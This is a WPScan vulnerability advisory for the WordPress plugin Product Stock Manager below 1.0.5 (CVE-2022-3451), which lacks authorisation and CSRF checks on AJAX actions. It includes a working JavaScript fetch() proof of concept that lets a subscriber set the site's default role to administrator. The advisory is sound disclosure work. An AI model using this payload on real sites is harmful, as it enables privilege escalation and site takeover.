WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Product Stock Manager < 1.0.5 - Subscriber+ Unauthorised AJAX Calls

Description

The plugin does not have authorisation and proper CSRF checks in multiple AJAX actions, allowing users with a role as low as subscriber to call them. One action in particular could allow to update arbitrary options

Proof of Concept

To set the default role for new users to administrator, run the below command in the developer console of the web browser while being logged on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=af_sm_set_checkbox_status&name=default_role&checkbox_status=administrator',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

addify-product-stock-manager
Fixed in version 1.0.5

References

CVE
CVE-2022-3451

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID
d8005cd0-8232-4d43-a4e4-14728eaf1300

Timeline

Publicly Published

2022-10-17 (about 3 months ago)

Added

2022-10-17 (about 3 months ago)

Last Updated

2022-10-17 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin